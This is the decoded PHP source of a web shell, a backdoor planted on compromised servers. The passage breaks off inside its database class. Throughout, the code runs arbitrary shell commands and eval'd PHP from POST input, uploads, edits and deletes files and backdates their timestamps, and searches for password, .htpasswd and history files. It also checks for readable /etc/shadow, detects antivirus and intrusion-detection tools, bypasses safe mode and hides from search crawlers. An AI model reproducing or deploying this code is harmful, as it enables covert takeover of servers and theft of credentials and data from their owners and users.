/* Decoded by unphp.net */
b'$color=" #F2A";
$default_action=\'FilesMan\';
$default_use_ajax=true;
$default_charset=\'Windows-1251\';
if(!empty($_SERVER[\'HTTP_USER_AGENT\'])){$userAgents=array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");if(preg_match(\'/\'.implode(\'|\',$userAgents).\'/i\',$_SERVER[\'HTTP_USER_AGENT\'])){header(\'HTTP/1.0 404 Not Found\');exit;}}
@session_start();@ini_set(\'error_log\',NULL);@ini_set(\'log_errors\',0);@ini_set(\'max_execution_time\',0);@set_time_limit(0);@set_magic_quotes_runtime(0);
if(get_magic_quotes_gpc()){function Xstripslashes($array){return is_array($array)?array_map(\'Xstripslashes\',$array):stripslashes($array);}$_POST=Xstripslashes($_POST);}
$os=\'nix\';if(strtolower(substr(PHP_OS,0,3))==\'win\')$os=\'win\';
$safe_mode=@ini_get(\'safe_mode\');if(!$safe_mode)error_reporting(0);
$disable_functions=@ini_get(\'disable_functions\');
$home_cwd=@getcwd();if(isset($_POST[\'c\']))@chdir($_POST[\'c\']);$cwd=@getcwd();if($os==\'win\'){$home_cwd=str_replace("\","/",$home_cwd);$cwd=str_replace("\","/",$cwd);}
if($cwd[strlen($cwd)-1]!=\'/\')$cwd.= \'/\';
if(!isset($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']))$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=(bool)$GLOBALS[\'default_use_ajax\'];
if($os==\'win\')
$aliases=array(
"List Directory"=>"dir",
"Find index.php in current dir"=>"dir /s /w /b index.php",
"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
"Show active connections"=>"netstat -an",
"Show running services"=>"net start",
"User accounts"=>"net user",
"Show computers"=>"net view",
"ARP Table"=>"arp -a",
"IP Configuration"=>"ipconfig /all"
);
else
$aliases=array(
"List dir"=>"ls -lha",
"list file attributes on a Linux second extended file system"=>"lsattr -va",
"show opened ports"=>"netstat -an | grep -i listen",
"process status"=>"ps aux",
"Find"=>"",
"find all suid files"=>"find / -type f -perm -04000 -ls",
"find suid files in current dir"=>"find.-type f -perm -04000 -ls",
"find all sgid files"=>"find / -type f -perm -02000 -ls",
"find sgid files in current dir"=>"find.-type f -perm -02000 -ls",
"find config.inc.php files"=>"find / -type f -name config.inc.php",
"find config* files"=>"find / -type f -name \"config*\"",
"find config* files in current dir"=>"find.-type f -name \"config*\"",
"find all writable folders and files"=>"find / -perm -2 -ls",
"find all writable folders and files in current dir"=>"find.-perm -2 -ls",
"find all service.pwd files"=>"find / -type f -name service.pwd",
"find service.pwd files in current dir"=>"find.-type f -name service.pwd",
"find all .htpasswd files"=>"find / -type f -name .htpasswd",
"find .htpasswd files in current dir"=>"find.-type f -name .htpasswd",
"find all .bash_history files"=>"find / -type f -name .bash_history",
"find .bash_history files in current dir"=>"find.-type f -name .bash_history",
"find all .fetchmailrc files"=>"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir"=>"find.-type f -name .fetchmailrc",
"Locate"=>"",
"locate httpd.conf files"=>"locate httpd.conf",
"locate vhosts.conf files"=>"locate vhosts.conf",
"locate proftpd.conf files"=>"locate proftpd.conf",
"locate psybnc.conf files"=>"locate psybnc.conf",
"locate my.conf files"=>"locate my.conf",
"locate admin.php files" =>"locate admin.php",
"locate cfg.php files"=>"locate cfg.php",
"locate conf.php files"=>"locate conf.php",
"locate config.dat files"=>"locate config.dat",
"locate config.php files"=>"locate config.php",
"locate config.inc files"=>"locate config.inc",
"locate config.inc.php"=>"locate config.inc.php",
"locate config.default.php files"=>"locate config.default.php",
"locate config* files "=>"locate config",
"locate .conf files"=>"locate \'.conf\'",
"locate .pwd files"=>"locate \'.pwd\'",
"locate .sql files"=>"locate \'.sql\'",
"locate .htpasswd files"=>"locate \'.htpasswd\'",
"locate .bash_history files"=>"locate \'.bash_history\'",
"locate .mysql_history files"=>"locate \'.mysql_history\'",
"locate .fetchmailrc files"=>"locate \'.fetchmailrc\'",
"locate backup files"=>"locate backup",
"locate dump files"=>"locate dump",
"locate priv files"=>"locate priv"
);
function XHeader(){
if(empty($_POST[\'charset\']))
$_POST[\'charset\']=$GLOBALS[\'default_charset\'];
global $color;
echo "
$_SERVER[HTTP_HOST] - Un1xL4dY
";
$freeSpace=@diskfreespace($GLOBALS[\'cwd\']);
$totalSpace=@disk_total_space($GLOBALS[\'cwd\']);
$totalSpace=$totalSpace?$totalSpace:1;
$release=@php_uname(\'r\');
$kernel=@php_uname(\'s\');
$explink=\'http://exploit-db.com/list.php?description=\';
if(strpos(\'Linux\',$kernel)!==false)
$explink .= urlencode(\'Linux Kernel \'.substr($release,0,6));
else
$explink .= urlencode($kernel.\' \'.substr($release,0,3));
if(!function_exists(\'posix_getegid\')){
$user=@get_current_user();
$uid=@getmyuid();
$gid=@getmygid();
$group="?";
}else {
$uid=@posix_getpwuid(posix_geteuid());
$gid=@posix_getgrgid(posix_getegid());
$user=$uid[\'name\'];
$uid=$uid[\'uid\'];
$group=$gid[\'name\'];
$gid=$gid[\'gid\'];
}
$cwd_links=\'\';
$path=explode("/",$GLOBALS[\'cwd\']);
$n=count($path);
for($i=0; $i<$n-1; $i++){
$cwd_links .= "
".$path[$i]."/ ";
}
$charsets=array(\'UTF-8\',\'Windows-1251\',\'KOI8-R\',\'KOI8-U\',\'cp866\');
$opt_charsets=\'\';
foreach($charsets as $item)
$opt_charsets .= \'
\'.$item.\' \';
$m=array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\');
if(!empty($GLOBALS[\'auth_pass\']))
$m[\'Logout\']=\'Logout\';
$m[\'Self remove\']=\'SelfRemove\';
$menu=\'\';
foreach($m as $k=>$v)
$menu .= \'
[ \'.$k.\' ] \';
$drives="";
if($GLOBALS[\'os\']==\'win\'){
foreach(range(\'c\',\'z\') as $drive)
if(is_dir($drive.\':\\'))
$drives .= \'
[ \'.$drive.\' ] \';
}
echo \'
Uname: User: Php: Hdd: Cwd:\'.($GLOBALS[\'os\']==\'win\'?\' Drives:\':\'\').\' \'
.\'\'.substr(@php_uname(),0,120).\' [exploit-db.com] \'.$uid.\' (\'.$user.\') Group: \'.$gid.\' (\'.$group.\') \'.@phpversion().\' Safe mode: \'.($GLOBALS[\'safe_mode\']?\'ON \':\'OFF \')
.\' [ phpinfo ] Datetime: \'.date(\'Y-m-d H:i:s\').\' \'.XViewSize($totalSpace).\' Free: \'.XViewSize($freeSpace).\' (\'. (int) ($freeSpace/$totalSpace*100).\'%) \'.$cwd_links.\' \'. XPermsColor($GLOBALS[\'cwd\']).\' [ home ] \'.$drives.\' \'
.\'\'.$opt_charsets.\' Server IP: \'.@$_SERVER["SERVER_ADDR"].\'Client IP: \'.$_SERVER[\'REMOTE_ADDR\'].\'
\'
.\'
\';
}
function XFooter(){
$is_writable=is_writable($GLOBALS[\'cwd\'])?" (Writeable) ":" (Not writable) ";
echo "
";
}
if(!function_exists("posix_getpwuid")&&(strpos($GLOBALS[\'disable_functions\'],\'posix_getpwuid\')===false)){
function posix_getpwuid($p){return false;}}
if(!function_exists("posix_getgrgid")&&(strpos($GLOBALS[\'disable_functions\'],\'posix_getgrgid\')===false)){
function posix_getgrgid($p){return false;}}
function XEx($in){
$out=\'\';
if(function_exists(\'exec\')){
@exec($in,$out);
$out=@join("
",$out);
}elseif(function_exists(\'passthru\')){
ob_start();
@passthru($in);
$out=ob_get_clean();
}elseif(function_exists(\'system\')){
ob_start();
@system($in);
$out=ob_get_clean();
}elseif(function_exists(\'shell_exec\')){
$out=shell_exec($in);
}elseif(is_resource($f=@popen($in,"r"))){
$out="";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function XViewSize($s){
if($s >= 1073741824)
return sprintf(\'%1.2f\',$s / 1073741824). \' GB\';
elseif($s >= 1048576)
return sprintf(\'%1.2f\',$s / 1048576).\' MB\';
elseif($s >= 1024)
return sprintf(\'%1.2f\',$s / 1024).\' KB\';
else
return $s.\' B\';
}
function XPerms($p){
if(($p & 0xC000)==0xC000)$i=\'s\';
elseif(($p & 0xA000)==0xA000)$i=\'l\';
elseif(($p & 0x8000)==0x8000)$i=\'-\';
elseif(($p & 0x6000)==0x6000)$i=\'b\';
elseif(($p & 0x4000)==0x4000)$i=\'d\';
elseif(($p & 0x2000)==0x2000)$i=\'c\';
elseif(($p & 0x1000)==0x1000)$i=\'p\';
else $i=\'u\';
$i .= (($p & 0x0100)?\'r\':\'-\');
$i .= (($p & 0x0080)?\'w\':\'-\');
$i .= (($p & 0x0040)?(($p & 0x0800)?\'s\':\'x\'):(($p & 0x0800)?\'S\':\'-\'));
$i .= (($p & 0x0020)?\'r\':\'-\');
$i .= (($p & 0x0010)?\'w\':\'-\');
$i .= (($p & 0x0008)?(($p & 0x0400)?\'s\':\'x\'):(($p & 0x0400)?\'S\':\'-\'));
$i .= (($p & 0x0004)?\'r\':\'-\');
$i .= (($p & 0x0002)?\'w\':\'-\');
$i .= (($p & 0x0001)?(($p & 0x0200)?\'t\':\'x\'):(($p & 0x0200)?\'T\':\'-\'));
return $i;
}
function XPermsColor($f){
if(!@is_readable($f))
return \'\'.XPerms(@fileperms($f)).\' \';
elseif(!@is_writable($f))
return \'\'.XPerms(@fileperms($f)).\' \';
else
return \'\'.XPerms(@fileperms($f)).\' \';
}
if(!function_exists("scandir")){
function scandir($dir){
$dh= opendir($dir);
while (false!==($filename=readdir($dh)))
$files[]=$filename;
return $files;
}
}
function XWhich($p){
$path=XEx(\'which \'.$p);
if(!empty($path))
return $path;
return false;
}
function actionSecInfo(){
XHeader();
echo \'Server security information \';
function XSecParam($n,$v){
$v=trim($v);
if($v){
echo \'
\'.$n.\': \';
if(strpos($v,"
") === false)
echo $v.\'
\';
else
echo \'
\'.$v.\' \';
}
}
XSecParam(\'Server software\',@getenv(\'SERVER_SOFTWARE\'));
if(function_exists(\'apache_get_modules\'))
XSecParam(\'Loaded Apache modules\',implode(\',\',apache_get_modules()));
XSecParam(\'Disabled PHP Functions\',$GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');
XSecParam(\'Open base dir\',@ini_get(\'open_basedir\'));
XSecParam(\'Safe mode exec dir\',@ini_get(\'safe_mode_exec_dir\'));
XSecParam(\'Safe mode include dir\',@ini_get(\'safe_mode_include_dir\'));
XSecParam(\'cURL support\',function_exists(\'curl_version\')?\'enabled\':\'no\');
$temp=array();
if(function_exists(\'mysql_get_client_info\'))
$temp[]="MySql (".mysql_get_client_info().")";
if(function_exists(\'mssql_connect\'))
$temp[]="MSSQL";
if(function_exists(\'pg_connect\'))
$temp[]="PostgreSQL";
if(function_exists(\'oci_connect\'))
$temp[]="Oracle";
XSecParam(\'Supported databases\',implode(\',\',$temp));
echo \'
\';
if($GLOBALS[\'os\']==\'nix\'){
XSecParam(\'Readable /etc/passwd\',@is_readable(\'/etc/passwd\')?"yes
[view] ":\'no\');
XSecParam(\'Readable /etc/shadow\',@is_readable(\'/etc/shadow\')?"yes
[view] ":\'no\');
XSecParam(\'OS version\',@file_get_contents(\'/proc/version\'));
XSecParam(\'Distr name\',@file_get_contents(\'/etc/issue.net\'));
if(!$GLOBALS[\'safe_mode\']){
$userful=array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');
$danger=array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');
$downloaders=array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');
echo \'
\';
$temp=array();
foreach ($userful as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Userful\',implode(\',\',$temp));
$temp=array();
foreach ($danger as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Danger\',implode(\',\',$temp));
$temp=array();
foreach ($downloaders as $item)
if(XWhich($item))
$temp[]=$item;
XSecParam(\'Downloaders\',implode(\',\',$temp));
echo \'
\';
XSecParam(\'HDD space\',XEx(\'df -h\'));
XSecParam(\'Hosts\',@file_get_contents(\'/etc/hosts\'));
}
}else {
XSecParam(\'OS Version\',XEx(\'ver\'));
XSecParam(\'Account Settings\',XEx(\'net accounts\'));
XSecParam(\'User Accounts\',XEx(\'net user\'));
}
echo \'
\';
XFooter();
}
function actionPhp(){
if(isset($_POST[\'ajax\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=true;
ob_start();
eval($_POST[\'p1\']);
$temp="document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"
\\' ")."\';
";
echo strlen($temp),"
",$temp;
exit;
}
XHeader();
if(isset($_POST[\'p2\'])&&($_POST[\'p2\']==\'info\')){
echo \'PHP info \';
ob_start();
phpinfo();
$tmp=ob_get_clean();
$tmp=preg_replace(\'!(body|a:\w+|body,td,th,h1,h2){.*}!msiU\',\'\',$tmp);
$tmp=preg_replace(\'!td,th {(.*)}!msiU\',\'.e,.v,.h,.h th {$1}\',$tmp);
echo str_replace(\'
\';
}
if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=false;
echo \'Execution PHP-code \';
if(!empty($_POST[\'p1\'])){
ob_start();
eval($_POST[\'p1\']);
echo htmlspecialchars(ob_get_clean());
}
echo \' \';
XFooter();
}
function actionFilesMan(){
XHeader();
echo \'File manager \';
if(!empty($_POST[\'p1\'])){
switch($_POST[\'p1\']){
case \'uploadFile\':
if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'],$_FILES[\'f\'][\'name\']))
echo "Can\'t upload file!";
break;
case \'mkdir\':
if(!@mkdir($_POST[\'p2\']))
echo "Can\'t create new dir";
break;
case \'delete\':
function deleteDir($path){
$path=(substr($path,-1)==\'/\')?$path:$path.\'/\';
$dh= opendir($path);
while (($item=readdir($dh))!==false){
$item=$path.$item;
if((basename($item)=="..")||(basename($item)=="."))
continue;
$type=filetype($item);
if($type=="dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST[\'f\']))
foreach($_POST[\'f\'] as $f){
if($f==\'..\')
continue;
$f=urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case \'paste\':
if($_SESSION[\'act\']==\'copy\'){
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.\'/\',$f,$d.$s.\'/\');
}elseif(is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION[\'f\'] as $f)
copy_paste($_SESSION[\'c\'],$f,$GLOBALS[\'cwd\']);
}elseif($_SESSION[\'act\']==\'move\'){
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h=@opendir($c.$s);
while (($f=@readdir($h))!==false)
if(($f!=".") and ($f!=".."))
copy_paste($c.$s.\'/\',$f,$d.$s.\'/\');
}elseif(@is_file($c.$s))
@copy($c.$s,$d.$s);
}
foreach($_SESSION[\'f\'] as $f)
@rename($_SESSION[\'c\'].$f,$GLOBALS[\'cwd\'].$f);
}elseif($_SESSION[\'act\']==\'zip\'){
if(class_exists(\'ZipArchive\')){
$zip=new ZipArchive();
if($zip->open($_POST[\'p2\'],1)){
chdir($_SESSION[\'c\']);
foreach($_SESSION[\'f\'] as $f){
if($f==\'..\')
continue;
if(@is_file($_SESSION[\'c\'].$f))
$zip->addFile($_SESSION[\'c\'].$f,$f);
elseif(@is_dir($_SESSION[\'c\'].$f)){
$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\'));
foreach ($iterator as $key=>$value){
$zip->addFile(realpath($key),$key);
}
}
}
chdir($GLOBALS[\'cwd\']);
$zip->close();
}
}
}elseif($_SESSION[\'act\']==\'unzip\'){
if(class_exists(\'ZipArchive\')){
$zip=new ZipArchive();
foreach($_SESSION[\'f\'] as $f){
if($zip->open($_SESSION[\'c\'].$f)){
$zip->extractTo($GLOBALS[\'cwd\']);
$zip->close();
}
}
}
}elseif($_SESSION[\'act\']==\'tar\'){
chdir($_SESSION[\'c\']);
$_SESSION[\'f\']=array_map(\'escapeshellarg\',$_SESSION[\'f\']);
XEx(\'tar cfzv \'.escapeshellarg($_POST[\'p2\']).\' \'.implode(\' \',$_SESSION[\'f\']));
chdir($GLOBALS[\'cwd\']);
}
unset($_SESSION[\'f\']);
break;
default:
if(!empty($_POST[\'p1\'])){
$_SESSION[\'act\']=@$_POST[\'p1\'];
$_SESSION[\'f\']=@$_POST[\'f\'];
foreach($_SESSION[\'f\'] as $k=>$f)
$_SESSION[\'f\'][$k]=urldecode($f);
$_SESSION[\'c\']=@$_POST[\'c\'];
}
break;
}
}
$dirContent=@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);
if($dirContent === false){echo \'Can\'t open this folder!\';XFooter(); return; }
global $sort;
$sort=array(\'name\',1);
if(!empty($_POST[\'p1\'])){
if(preg_match(\'!s_([A-z]+)_(\d{1})!\',$_POST[\'p1\'],$match))
$sort=array($match[1],(int)$match[2]);
}
echo "
Name Size Modify Owner/Group Permissions Actions ";
$dirs=$files=array();
$n=count($dirContent);
for($i=0;$i<$n;$i++){
$ow=@posix_getpwuid(@fileowner($dirContent[$i]));
$gr=@posix_getgrgid(@filegroup($dirContent[$i]));
$tmp=array(\'name\'=>$dirContent[$i],
\'path\'=>$GLOBALS[\'cwd\'].$dirContent[$i],
\'modify\'=>date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])),
\'perms\'=>XPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]),
\'size\'=>@filesize($GLOBALS[\'cwd\'].$dirContent[$i]),
\'owner\'=>$ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),
\'group\'=>$gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i]))
$files[]=array_merge($tmp,array(\'type\'=>\'file\'));
elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i]))
$dirs[]=array_merge($tmp,array(\'type\'=>\'link\',\'link\'=>readlink($tmp[\'path\'])));
elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i]!="."))
$dirs[]=array_merge($tmp,array(\'type\'=>\'dir\'));
}
$GLOBALS[\'sort\']=$sort;
function XCmp($a,$b){
if($GLOBALS[\'sort\'][0]!=\'size\')
return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]),strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);
else
return (($a[\'size\'] < $b[\'size\'])?-1:1)*($GLOBALS[\'sort\'][1]?1:-1);
}
usort($files,"XCmp");
usort($dirs,"XCmp");
$files=array_merge($dirs,$files);
$l=0;
foreach($files as $f){
echo \'\'.htmlspecialchars($f[\'name\']):\'g(\'FilesMan\',\'\'.$f[\'path\'].\'\');" title=\'.$f[\'link\'].\'>[ \'.htmlspecialchars($f[\'name\']).\' ] \').\' \'.(($f[\'type\']==\'file\')?XViewSize($f[\'size\']):$f[\'type\']).\' \'.$f[\'modify\'].\' \'.$f[\'owner\'].\'/\'.$f[\'group\'].\' \'.$f[\'perms\']
.\' R T \'.(($f[\'type\']==\'file\')?\' E D \':\'\').\' \';
$l=$l?0:1;
}
echo "
Copy Move Delete ";
if(class_exists(\'ZipArchive\'))
echo "Compress (zip) Uncompress (zip) ";
echo "Compress (tar.gz) ";
if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\']))
echo "Paste / Compress ";
echo " ";
if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])&&(($_SESSION[\'act\']==\'zip\')||($_SESSION[\'act\']==\'tar\')))
echo "file name: ";
echo " >\'>
";
XFooter();
}
function actionFilesTools(){
if(isset($_POST[\'p1\']))
$_POST[\'p1\']=urldecode($_POST[\'p1\']);
if(@$_POST[\'p2\']==\'download\'){
if(@is_file($_POST[\'p1\'])&&@is_readable($_POST[\'p1\'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));
if(function_exists("mime_content_type")){
$type=@mime_content_type($_POST[\'p1\']);
header("Content-Type: ".$type);
}else
header("Content-Type: application/octet-stream");
$fp=@fopen($_POST[\'p1\'],"r");
if($fp){
while(!@feof($fp))
echo @fread($fp,1024);
fclose($fp);
}
}exit;
}
if(@$_POST[\'p2\']==\'mkfile\'){
if(!file_exists($_POST[\'p1\'])){
$fp=@fopen($_POST[\'p1\'],\'w\');
if($fp){
$_POST[\'p2\']="edit";
fclose($fp);
}
}
}
XHeader();
echo \'File tools \';
if(!file_exists(@$_POST[\'p1\'])){
echo \'File not exists\';
XFooter();
return;
}
$uid=@posix_getpwuid(@fileowner($_POST[\'p1\']));
if(!$uid){
$uid[\'name\']=@fileowner($_POST[\'p1\']);
$gid[\'name\']=@filegroup($_POST[\'p1\']);
}else $gid=@posix_getgrgid(@filegroup($_POST[\'p1\']));
echo \'
Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\'
Size: \'.(is_file($_POST[\'p1\'])?XViewSize(filesize($_POST[\'p1\'])):\'-\').\'
Permission: \'.XPermsColor($_POST[\'p1\']).\'
Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';
echo \'
Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\'
Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\'
Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'
\';
if(empty($_POST[\'p2\']))
$_POST[\'p2\']=\'view\';
if(is_file($_POST[\'p1\']))
$m=array(\'View\',\'Highlight\',\'Download\',\'Hexdump\',\'Edit\',\'Chmod\',\'Rename\',\'Touch\');
else
$m=array(\'Chmod\',\'Rename\',\'Touch\');
foreach($m as $v)
echo \'
\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ] \':$v).\' \';
echo \'
\';
switch($_POST[\'p2\']){
case \'view\':
echo \'
\';
$fp=@fopen($_POST[\'p1\'],\'r\');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo \' \';
break;
case \'highlight\':
if(@is_readable($_POST[\'p1\'])){
echo \'
\';
$code=@highlight_file($_POST[\'p1\'],true);
echo str_replace(array(\'\'),array(\'\'),$code).\'
\';
}
break;
case \'chmod\':
if(!empty($_POST[\'p3\'])){
$perms=0;
for($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)
$perms += (int)$_POST[\'p3\'][$i]*pow(8,(strlen($_POST[\'p3\'])-$i-1));
if(!@chmod($_POST[\'p1\'],$perms))
echo \'Can\'t set permissions!
\';
}
clearstatcache();
echo \'
\';
break;
case \'edit\':
if(!is_writable($_POST[\'p1\'])){
echo \'File isn\'t writeable\';
break;
}
if(!empty($_POST[\'p3\'])){
$time=@filemtime($_POST[\'p1\']);
$_POST[\'p3\']=substr($_POST[\'p3\'],1);
$fp=@fopen($_POST[\'p1\'],"w");
if($fp){
@fwrite($fp,$_POST[\'p3\']);
@fclose($fp);
echo \'Saved!
\';
@touch($_POST[\'p1\'],$time,$time);
}
}
echo \'
\';
$fp=@fopen($_POST[\'p1\'],\'r\');
if($fp){
while(!@feof($fp))
echo htmlspecialchars(@fread($fp,1024));
@fclose($fp);
}
echo \' \';
break;
case \'hexdump\':
$c=@file_get_contents($_POST[\'p1\']);
$n=0;
$h=array(\'00000000
\',\'\',\'\');
$len=strlen($c);
for ($i=0; $i<$len; ++$i){
$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';
switch (ord($c[$i])){
case 0:$h[2] .= \' \'; break;
case 9:$h[2] .= \' \'; break;
case 10: $h[2] .= \' \'; break;
case 13: $h[2] .= \' \'; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if($n==32){
$n=0;
if($i+1 < $len){$h[0] .= sprintf(\'%08X\',$i+1).\'
\';}
$h[1] .= \'
\';
$h[2] .= "
";
}
}
echo \'
\'.$h[0].\' \'.$h[1].\' \'.htmlspecialchars($h[2]).\'
\';
break;
case \'rename\':
if(!empty($_POST[\'p3\'])){
if(!@rename($_POST[\'p1\'],$_POST[\'p3\']))
echo \'Can\'t rename!
\';
else
die(\'\');
}
echo \'
\';
break;
case \'touch\':
if(!empty($_POST[\'p3\'])){
$time=strtotime($_POST[\'p3\']);
if($time){
if(!touch($_POST[\'p1\'],$time,$time))
echo \'Fail!\';
else
echo \'Touched!\';
}else echo \'Bad time format!\';
}
clearstatcache();
echo \'
\';
break;
}
echo \'
\';
XFooter();
}
function actionSafeMode(){
$temp=\'\';
ob_start();
switch($_POST[\'p1\']){
case 1:
$temp=@tempnam($test,\'cx\');
if(@copy("compress.zlib://".$_POST[\'p2\'],$temp)){
echo @file_get_contents($temp);
unlink($temp);
}else
echo \'Sorry... Can\'t open file\';
break;
case 2:
$files=glob($_POST[\'p2\'].\'*\');
if(is_array($files))
foreach ($files as $filename)
echo $filename."
";
break;
case 3:
$ch=curl_init("file://".$_POST[\'p2\']." ".preg_replace(\'!\(\d+\)\s.*!\',\'\',__FILE__));
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST[\'p2\']);
break;
case 5:
for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++){
$uid=@posix_getpwuid($_POST[\'p2\']);
if($uid)
echo join(\':\',$uid)."
";
}
break;
}
$temp=ob_get_clean();
XHeader();
echo \'Safe mode bypass \';
XFooter();
}
function actionConsole(){
if(!empty($_POST[\'p1\'])&&!empty($_POST[\'p2\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']=true;
$_POST[\'p1\'] .= \' 2>&1\';
}elseif(!empty($_POST[\'p1\']))
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']=false;
if(isset($_POST[\'ajax\'])){
$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']=true;
ob_start();
echo "d.cf.cmd.value=\'\';
";
$temp=@iconv($_POST[\'charset\'],\'UTF-8\',addcslashes("
$ ".$_POST[\'p1\']."
".XEx($_POST[\'p1\']),"
\\' "));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST[\'p1\'],$match)){
if(@chdir($match[1])){
$GLOBALS[\'cwd\']=@getcwd();
echo "c_=\'".$GLOBALS[\'cwd\']."\';";
}
}
echo "d.cf.output.value+=\'".$temp."\';";
echo "d.cf.output.scrollTop=d.cf.output.scrollHeight;";
$temp=ob_get_clean();
echo strlen($temp),"
",$temp;
exit;
}
XHeader();
echo "";
echo \'Console \';
XFooter();
}
function actionLogout(){
session_destroy();
die(\'bye!\');
}
function actionSelfRemove(){
if($_POST[\'p1\']==\'yes\')
if(@unlink(preg_replace(\'!\(\d+\)\s.*!\',\'\',__FILE__)))
die(\'Shell has been removed\');
else
echo \'unlink error!\';
if($_POST[\'p1\']!=\'yes\')
XHeader();
echo \'Suicide Really want to remove the shell?
Yes \';
XFooter();
}
function actionSql(){
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type){
$this->type=$type;
}
function connect($host,$user,$pass,$dbname){
switch($this->type){
case \'mysql\':
if($this->link=@mysql_connect($host,$user,$pass,true)) return true;
break;
case \'pgsql\':
$host=explode(\':\',$host);
if(!$host[1]) $host[1]=5432;
if($this->link=@pg_connect("host={$host[0]}port={$host[1]}user=$user password=$pass dbname=$dbname")) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case \'mysql\':
if(@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case \'mysql\':
return $this->res=@mysql_query($str);
break;
case \'pgsql\':
return $this->res=@pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res=func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case \'mysql\':
return @mysql_fetch_assoc($res);
break;
case \'pgsql\':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case \'mysql\':
return $this->query("SHOW databases");
break;
case \'pgsql\':
return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case \'mysql\':
return $this->res=$this->query(\'SHOW TABLES\');
break;
case \'pgsql\':
return $this->res=$this->query("select table_name from information_schema.tables where table_schema!=\'information_schema\' AND table_schema!=\'pg_catalog\'");
break;
}
return false;
}
function error(){
switch($this->type){
case \'mysql\':
return @mysql_error();
break;
case \'pgsql\':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case \'mysql\':
if(function_exists(\'mysql_set_charset\'))
return @mysql_set_charset($str,$this->link);
else
$this->query(\'SET CHARSET \'.$str);
break;
case \'pgsql\':
return @pg_set_client_encoding($this->link,$str);
break;
}
return false;
}
function loadFile($str){
